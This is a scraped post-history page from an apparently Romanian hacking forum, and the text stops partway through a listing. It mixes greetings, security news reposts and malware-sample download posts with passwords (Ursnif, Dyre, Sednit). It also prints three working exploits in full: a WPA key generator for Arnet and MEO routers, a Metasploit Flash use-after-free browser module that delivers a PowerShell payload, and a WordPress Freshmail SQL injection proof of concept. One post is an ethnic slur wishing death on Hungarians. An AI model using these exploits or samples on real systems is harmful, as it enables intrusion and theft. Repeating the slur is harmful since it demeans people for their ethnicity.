Aerosol
-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
Multam bre, foarte buna ideea ta! -
Malware downloader using some anti-forensics (doesn't work), UAC bypass method (uacme concept #10) and seems full of specific code for various AV's behaviour detection systems. According to VT there is no meaningful name to it from AV, yet. Loader comes probably from script-kiddie who previously worked on ransomware(s). Nick name "Phobos". Reviewed by damagelab -> https://damagelab.org/index.php?showtopic=25839 (site unavailable at the moment of post). Except uac bypass so far there is nothing interesting in this loader. Malware injects itself into copy of explorer.exe and by using IFileOperation autoelevation (trigger UAC set on max) copies bthudtask.exe to system32\setup folder. Next it makes a copy of system dll newdev.dll, patches it with shellcode (EPO + new section) and again with IFileOperation (triggering UAC 2nd time) copies this dll into system32\setup. Next loader start bthudtask.exe with ShellExecuteEx. As result there happening classical dll hijacking and since bthudtask.exe autoelevated, malware stored inside patched newdev.dll will be running on High IL. This autoelevation method abuses way of whitelisting MS did with UAC, where it doesn't control full path to autoelevated application (while they actually must be all hardcoded) nor controlling application specific dlls loading path (even if application inside system32 you must control it too) allowing attacker do all required manipulations inside Windows folder, preparing things for successful dll hijacking. After successful elevation you will see hit-parade of spawning processes - two copies of explorer.exe for example or svchost.exe if something went wrong. That circus not suspicious at all, sarcasm. There was an interesting overview of successful/failed autoelevations in damagelab post. Statistic data show that most of people (in targeted countries) sit under default UAC settings (or with UAC turned off) even on Windows 8.1. Please don't be shy and submit sample to as many AV companies as you can. VT dropper https://www.virustotal.com/en/file/903d299b366ef1ba11538924dd57811aff80b8b91123889b872a098639a8effa/analysis/1431575696/ VT loader part https://www.virustotal.com/en/file/ad3ba3bcd64aa9670389bedebe328c6874c96f2dea6ec2abb41b8c7537dc3d8d/analysis/1431574970/ Sample courtesy of vaber and R136a1 Dropper and patched by shellcode newdev.dll in attach. Download Pass: malware Source
-
Download here is a sample of W2KM_BARTALEX.VVRA this MSoffice file when executed download UPATRE and DYRE also attached https://www.virustotal.com/en/file/25da9335c1e791a39895bcebe6bff322e9bff5f91e53cf36383d1f223a7752d1/analysis/ and here are the download files Download TROJ_UPATRE.VVRA.zip Download TSPY_DYRE.VVRA.zip Source
-
Hi, attached is the variant of Sednit which uses local privilege escalation vulnerability CVE-2015-1701 More information: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Download Pass: infected Source
-
There's an extremely critical bug in the Xen, KVM, and native QEMU virtual machine platforms and appliances that makes it possible for attackers to break out of protected guest environments and take full control of the operating system hosting them, security researchers warned Wednesday. The vulnerability is serious because it pierces a key protection that many cloud service providers use to segregate one customer's data from another's. If attackers with access to one virtualized environment can escape to the underlying operating system, they could potentially access all other virtual environments. In the process, they would be undermining one of the fundamental guarantees of virtual machines. Compounding the severity, the vulnerability resides in a low-level disk controller, allowing it to be exploited when guest or host OSes alike run Linux, Windows, Mac OS X, or possibly other OSes. Researchers from security firm CrowdStrike, who first warned of the vulnerability, wrote: The vulnerability is the result of a buffer-overflow bug in QEMU's virtual Floppy Disk Controller, which is used in a variety of virtualization platforms and appliances. It is known to affect Xen, KVM, and the native QEMU client software, and it may affect others. VMware, Microsoft Hyper-V, and Bochs hypervisors are not affected. At publication time, patches were available from the Xen Project and the QEMU Project. RedHat has a patch here. There are also workarounds users can follow to lessen the risk of exploitation. The vulnerability is serious enough that users of other virtualization packages should immediately contact the developers to find out if they're susceptible. The bug has existed since 2004. There's no indication that the vulnerability is being actively exploited maliciously in the wild. Although the vulnerability is agnostic of the OS running both the guest and host, attack code exploiting the bug must have administrative or root privileges to the guest. The threat is greatest for people who rely on virtual private servers, which allow service providers to host multiple operating systems on a single physical server. Because virtual servers are often provided to different customers, it's common that they have administrative or root privileges to that guest OS that could be used to take over the underlying machine. CrowdStrike's advisory went on to state: For those who are unable to patch vulnerable software, CrowdStrike offered the following: The vulnerability has been dubbed Venom, short for virtualized environment neglected operations manipulation. Some people are already comparing its severity to Heartbleed, the catastrophic bug disclosed in April 2014 that exposed private cryptography keys, end-user passwords, and other sensitive data belonging to countless services that used the OpenSSL crypto library. At this early stage, it's too early to know if the comparison to Heartbleed is exaggerated, since at the moment there's no indication that Venom is being actively exploited. Tod Beardsley, a research manager at vulnerability assessment provider Rapid7, has indicated that the threat from Venom is likely not as serious. In an e-mailed statement, he wrote: Those limitations aside, there's an extremely broad range of platforms that are vulnerable to this exploit, and those platforms house servers used by banks, e-commerce providers, and countless other sensitive services. Given the large number of servers that are vulnerable and the extremely high value of the assets they contain, this security bug should be considered a top priority. Source
-
A former cop and owner of the website Polygraph.com has pleaded guilty to five charges of obstruction of justice and mail fraud for teaching people how to cheat lie detector tests. Douglas Williams, 69, of Norman, Oklahoma, faces up to 20 years in jail and up to a $250,000 fine for selling polygraph-evasion training to two clients who were actually part of an undercover sting operation. The first undercover operative posed as an agent with the Department of Homeland Security and told Williams that he wanted to conceal the fact that he been involved with smuggling drugs through the airport where he worked. A second undercover agent told Williams he was applying for a job with the Border Patrol and wanted to hide his criminal history. Williams told both clients – who paid him $1,000 if they traveled to his home and $5,000 if he traveled to meet them (plus travel expenses) – that they should deny they had received his training. According the indictment [PDF] brought against Williams, when the operative posing as a DHS agent admitted he was lying about his innocence, Williams exploded: "I told you I’m assisting you under the assumption that you are telling the truth. What the fuck do you think you’re doing dumbass? Do you think you have, do you think you have like a lawyer confidentiality with me?" But in truth, Williams was undeterred and continued to train the self-styled DHS agent. He grew paranoid and told his client to change his cell phone number and to respond to a new email he sent him from "the paranoid chicken." Then just hours later he changed his mind about changing the telephone number and focused instead on getting paid through an untraceable money order. Money talks Ten days later, Williams flew to meet the so-called DHS agent, who again admitted he had helped smuggle drugs on four occasions. Nonetheless, Williams continued to train him in how to lie – which is a big no-no when you work for the US Department of Justice. "Lying, deception and fraud cannot be allowed to influence the hiring of national security and law enforcement officials, particularly when it might affect the security of our borders," said Assistant Attorney General Caldwell of the Justice Department’s Criminal Division in a statement announcing Williams' guilty plea. "Today’s conviction sends a message that we pursue those who attempt to corrupt law enforcement wherever and however they may try to do so." Williams was more careful when talking about his services in a promotional video. "Even if you tell the complete truth, you will fail 50 per cent of the time," he said in the video, explaining that lie detectors assume that being nervous when you are asked a question indicates you are guilty of whatever was asked. "Why fail?" Williams asks. "Just because you're nervous doesn't mean you're lying. I can teach you how to pass, nervous or not, no matter what." But the Justice Department holds that he crossed the line when he readily trained people who he believed had criminal records and were hoping to conceal their crimes from government authorities. According to the indictment, which was handed down in November, Williams told one of the undercover agents, "I don’t give a damn if you’re the biggest heroin dealer in the fucking United States." Later he added: "I haven't lived this long and fucked the government this long, and done such a controversial thing that I do for this long, and got away with it without any trouble whatsoever, by being a dumb ass." The DoJ would beg to differ. Source
-
Scammers use phishing emails to get consumers to click on links to websites they've created solely for the purpose of information theft. They trick users into typing their names, addresses, login IDs, passwords or credit card information into fields on sites that look like they belong to real companies. In some cases, just clicking the link provided in an email will automatically drop malware onto the user's device. Once the malware is installed, hackers can easily steal the victim's information without their knowledge. Phishers are getting better and better at making their traps look real, copying logos and creating sham urls and email addresses that look like actual corporate credentials. The Intel quiz displayed 10 real emails delivered to inboxes and collected by analysts at McAfee Labs, which is part of Intel Security. Some were legitimate correspondences from major companies, while others were phishing emails that look extremely believable. Of the 19,458 people who took the quiz, the vast majority -- 80 percent -- fell for at least one of the fake phishing emails they saw. Only 3 percent got a perfect score. Interestingly, the one email that was most often misidentified in the quiz was actually a legitimate letter. It raised false alarm bells by encouraging readers to claim free ads, a clicky turn of phrase that made people wary. Compared to the other 143 countries represented in the survey, the U.S. ranked 27th overall in ability to detect phishing. Americans' average 68 percent accuracy was just a few points above the global average. France, Sweden, Hungary, the Netherlands and Spain turned in the best performances. The results serve as yet another reminder to click with caution -- or not click at all. Intel Security's Gary Davis urged people to keep security software and browsers up to date to help weed out malicious sites and downloads, and to hover over links before clicking on them to make sure they point where they say they do. He also warned of obvious red flags, such as misspellings or bad grammar, that can help tip you off to a fraudulent correspondence. Want to see how you'd do on the quiz? You can try your hand at it above. If you don't score well, don't take it too hard. When Intel circulated an earlier version of it to Internet security professionals last year, 94 percent were fooled at least once. Source
-
Salut si bine ai venit frate, sper sa iti placa aici.
-
Felicitari @sleed si bafta in continuare la cautat!
-
Dar NU cum ai spus tu: Ochii mei... OFF:// degeaba scrii cu diacritice daca nu stii sa scrii corect d.p.d.v. gramatical sau sa folosesti semnele de punctuatie. On:// Bine ai venit, nu e ok sa sari la cearta cand stii ca NU ai dreptate, sper sa stai cat mai mult printre noi si sa inveti lucruri utile. @Bright asta NU e o scuza, eu am momente cand nici pe alea 2 ore nu le dorm!
-
CS:GO si DOTA 2!
-
Salut Sorin.
-
Salut si ,,bun venit"!
-
Hai noroc si bine ai venit!
-
S-a trezit acum si Ponta. _|_ ANTI-BOZGORI ( afara cu bozgorii din tara romaneasca ) On:// Care este cel mai bun Ungur? Ala ce nu mai respira (sau sta in tara LUI)!
-
Foarte multe ex: cine stie ce are prin ea tema ( posibil vre-un shell ) urcand teme de genul pe site ( fara sa ai cunostiinte ) poti "da acces" fara sa vrei la site persoanei ce a pus shell-ul in tema sau mai stiu eu ce...
-
Infect files on removable disks and remote network drives. Description Virus:Win32/Ursnif VT: https://www.virustotal.com/en/file/8fa8122cfa52d7ff7fd8d918ccc9089a1762420c23edb6c50e8573456bfcdde3/analysis/1430975102/ https://www.virustotal.com/en/file/9bd91d207911b08489079c3927478b824b7948b741e1b6221339893581e4e9cb/analysis/1430976279/ Download Malware Pass: infected Source
-
Win32k Elevation of Privilege Vulnerability. Allows code to be executed in kernel mode. Used by malware to target Windows 7. Apply MS15-051 for fix. https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://github.com/hfiref0x/CVE-2015-1701 Download pass: exploit Source
-
The 16 million Starbucks customers who use the company’s mobile payment service may want to strengthen their log-in credentials and reconsider using the auto-load feature. Independent journalist and best-selling author Bob Sullivan reported on Monday that hackers recently stole money from several Starbucks customers by gaining access to their credit card information through the Starbucks app and using the auto-load function. Sullivan described how one Starbucks customer had $34.77 stolen from her account last week, another $25 after it was auto-loaded, and another $75 after the hackers changed her auto-load amount. All of this took place in less than ten minutes. Sullivan cites three other Starbucks customers who had their accounts hacked within the past month. This Reddit thread shows a handful of others who had similar issues. Some hackers even used stolen accounts to email gift cards to themselves. “Essentially, any criminal who obtains username and password credentials to Starbucks.com can drain a consumer’s stored value, and attack their linked credit card,” Sullivan noted. Sullivan added that hackers who gain access to a Starbucks card can move balances to a card or account they control by changing a victim’s email address used for a transfer verification code. “Because the crime is so simple, can escalate quickly, and the consumer protections controlling the transaction are unclear, I recommend all Starbucks consumers immediately disable auto-reload on the Starbucks mobile payments and gift cards,” Sullivan wrote. Starbucks spokeswoman Maggie Jantzen told GeekWire that these recent incidents are “not widespread” and noted that “customer security is incredibly important to us.” “We have safeguards in place to constantly monitor for fraudulent activity and, like all major retailers, work closely with financial institutions to make sure our customers are protected,” she said. Jantzen also said that Starbucks encourages customers to “use several best practices to ensure their information is as protected as possible,” like strong passwords. “Customers are not responsible for charges or transfers they did not make and if a customer’s Card is registered, their account balance is protected,” she added. “If a customer sees unauthorized activity on their account, we encourage them to contact us immediately.” This is not the first time hackers have taken advantage of Starbucks’ auto-load feature, with customers noticing similar issues dating back to 2013. Starbucks has placed a big emphasis on mobile transactions over the past few years, with CEO Howard Schultz noting late last year that 16 percent of its U.S. sales came from a smartphone. Starbucks also recently suffered a massive point-of-sale computer outage that struck stores in the U.S. and Canada last month. Source
-
Security researchers are warning PC users in Australia to beware of new Breaking Bad-themed ransomware demanding up to $1000 AUD ($796 USD) to decrypt essential computer files. The attacks typically arrive in the form of a malicious zip archive which takes the name of a famous delivery firm as its file name, according to Symantec. The AV giant continued in a blog post: “This zip archive contains a malicious file called ‘PENALTY.VBS’ (VBS.Downloader.Trojan) which when executed, downloads the crypto ransomware onto the victim’s computer. The threat also downloads and opens a legitimate .pdf file to trick users into thinking that the initial zip archive was not a malicious file. Based on our initial analysis, the threat appears to be using components or similar techniques to an open-source penetration-testing project, which uses Microsoft PowerShell modules. This allows the attackers to run their own PowerShell script on the compromised computer to operate the crypto ransomware.” The ransom demand message that flashes up to victims uses the Los Pollos Hermanos brand, as seen in Breaking Bad – demanding they pay $450 within a specified time or else the charge will rise to $1000. The email provided for “support-related enquiries” also references lead character Walter White’s description of himself in season four as “the one who knocks.” The victim’s images, videos, documents and other important files are encrypted using a random AES key which is in turn encrypted with an RSA public key. This requires them to obtain the corresponding private key from the attackers to effectively get their files back. Also included is a handy video tutorial on how to buy bitcoins – in order to help victims pay the ransom. Symantec said its customers were protected from Trojan.Cryptolocker.S and referred worried netizens to its dedicated blog on ransomware. Cyber-criminals are increasingly turning to ransomware as an easy way to make a fast buck – sometimes with tragic results. In January it was reported that a 17-year-old student from Windsor committed suicide after receiving messages that he’d visited illegal sites and that indecent images had been found on his computer. Source
-
WE’VE SUSPECTED IT all along—that Skynet, the massive program that brings about world destruction in the Terminator movies, was just a fictionalization of a real program in the hands of the US government. And now it’s confirmed—at least in name. As The Intercept reports today, the NSA does have a program called Skynet. But unlike the autonomous, self-aware computerized defense system in Terminator that goes rogue and launches a nuclear attack that destroys most of humanity, this one is a surveillance program that uses phone metadata to track the location and call activities of suspected terrorists. A journalist for Al Jazeera reportedly became one of its targets after he was placed on a terrorist watch list. Ahmad Muaffaq Zaidan, bureau chief for Al Jazeera’s Islamabad office, got tracked by Skynet after he was identified by US intelligence as a possible Al Qaeda member and assigned a watch list number. A Syrian national, Zaidan has scored a number of exclusive interviews with senior Al Qaeda leaders, including Osama bin Laden himself. Skynet uses phone location and call metadata from bulk phone call records to detect suspicious patterns in the physical movements of suspects and their communication habits, according to a 2012 government presentation The Intercept obtained from Edward Snowden. The presentation indicates that Skynet looks for terrorist connections based on questions such as “who has traveled from Peshawar to Faisalabad or Lahore (and back) in the past month? Who does the traveler call when he arrives?” It also looks for suspicious behaviors such as someone who engages in “excessive SIM or handset swapping” or receives “incoming calls only.” The goal is to identify people who move around in a pattern similar to Al Qaeda couriers who are used to pass communication and intelligence between the group’s senior leaders. The program tracked Zaidan because his movements and interactions with Al Qaeda and Taliban leaders matched a suspicious pattern—which is, it turns out, very similar to the pattern of journalists meeting with sources. We should note that the NSA has a second program that more closely resembles the Terminator‘s Skynet. This one is called MonsterMind, as revealed by Edward Snowden last year in an interview with WIRED and James Bamford. MonsterMind, like the film version of Skynet, is a defense surveillance system that would instantly and autonomously neutralize foreign cyberattacks against the US, and could be used to launch retaliatory strikes as well. Under this program algorithms would scour massive repositories of metadata and analyze it to differentiate normal network traffic from anomalous or malicious traffic. Armed with this knowledge, the NSA could instantly and autonomously identify, and block, a foreign threat. Snowden also suggested, however, that MonsterMind could one day be designed to return fire—automatically, without human intervention—against an attacker. Because an attacker could tweak malicious code to avoid detection, a counterstrike would be more effective in neutralizing future attacks. Sounds a lot like Skynet. No word from the NSA on why they didn’t use that iconic film name for its real-world Skynet. Source
-
Cisco has patched a remote code execution bug that could give attackers root privileges on its Unified Computing System (UCS) Central software used by more than 30,00 organisations. The UCS data centre server platform joins hardware, virtualisation, networking and software into one system. Versions 1.2 and below are affected. The Borg says the vulnerability (CVE-2015-0701) rates the maximum 10 severity rating due to its low exploitation requirements and "complete" impact to confidentiality, integrity and availability. "A vulnerability in the web framework of Cisco UCS Central Software could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device," it says in an advisory. "The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user." The Borg says patches for the bug are available but warns there are no workarounds. <pSuccessful exploitation of the problem would grant unauthenticated access to sensitive information, allow arbitrary command execution on UCS boxes' operating systems, or create denial of service conditions. Happily, no attacks using the flaw have been spotted in the wild. Source
-
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' @license: GPLv3 @author : Eduardo Novella @ARNetOnline via Twitter @enovella_ 2014-09-15 Send a message via website, still looking for a simple mail ([url]http://www.telecom.com.ar/hogares/contacto_tecnico.html[/url]) 2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form. 2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key 2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though. 2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest. 2014-09-24 I send the problem to the vendor ADB Pirelli via website form 2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland 2015-01-05 Full disclosure and CVE-2015-0558 assigned PORTUGAL ================ 2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm 2015-04-05 Send a message to @MEOpt via Twitter @enovella_ 2015-04-05 I got response in matter of minutes \o/ 2015-04-05 I send an email to [email]luis-oliveira-cc@telecom.pt[/email] , stating the reference 3-78405621289 in email subject 2015-05-07 Full disclosure ----------------- [*] Changelog : ----------------- 2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX 2015-02-01 v1.3 Final version, hopefully 2015-01-12 v1.2 Confusion between LAN and WLAN mac address 2015-01-10 v1.1 --allKeys flag added 2014-09-11 v1.0 First PoC working ''' import re import sys import hashlib import argparse VERSION = 1 SUBVERSION = 4 DATEVERSION = '2015-05-06' URL = 'http://www.ednolo.alumnos.upv.es' def genkey(mac,stdout='True'): seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' + '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8') lookup = '0123456789abcdefghijklmnopqrstuvwxyz' sha256 = hashlib.sha256() sha256.update(seed) sha256.update('1236790') sha256.update(mac) digest = bytearray(sha256.digest()) if (stdout): print "[+] SHA256 : %s" % sha256.hexdigest() return ''.join([lookup[x % len(lookup)] for x in digest[0:10]]) def printTargets(): print "[+] Possible vulnerable targets so far:" for t in targets: print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper())) sys.exit() def checkTargets(bssid): supported = False for t in targets: if ( bssid.upper().startswith(t) ): supported = True break if (not supported): print "[!] Your bssid looks like not supported! Generating anyway." def addIncToMac(mac_str, inc): try: mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc)) except: sys.exit('[!] Use real input ') return mac def main(): global targets version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL) targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54', '30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F'] parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See [url]http://ednolo.alumnos.upv.es/[/url] for more details. Twitter: @enovella_ and email: ednolo[at]inf.upv.es. This software is used just as proof-of-concept, commit fraud depends on you! ''', epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0]) ) maingroup = parser.add_argument_group(title='required') maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address') parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version) command_group = parser.add_mutually_exclusive_group() command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true') command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true") args = parser.parse_args() if args.list: printTargets() elif args.bssid: mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid) if len(mac_str) != 12: sys.exit('[!] Check MAC format!\n') try: checkTargets(args.bssid) print '[+] MAC : %s' % args.bssid if (args.allkeys): print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)' for i in xrange(-2,5): mac = addIncToMac(mac_str,i) print '%-10s' % ((genkey(mac, False))) print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)' for i in xrange(-2,5): mac = addIncToMac(mac_str,i) print '%-10s' % ((genkey(mac, False)[:8])) else: wpa = genkey((addIncToMac(mac_str,0)), False) print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)") print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)" ) except: sys.exit('[!] Are you trying to crash me? ') else: parser.print_help() if __name__ == "__main__": main() Source
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free', 'Description' => %q{ This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134. }, 'License' => MSF_LICENSE, 'Author' => [ 'bilou', # Vulnerability discovery according to Flash Advisory 'Unknown', # Exploit in the wild 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one) 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-0359'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'], ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'], ['URL', 'https://git.hacklab.kr/snippets/13'], ['URL', 'http://pastebin.com/Wj3NViUu'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Apr 14 2014', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source
-
------------------------ ISSUE 1: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6 ------------------------ ISSUE 2: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la 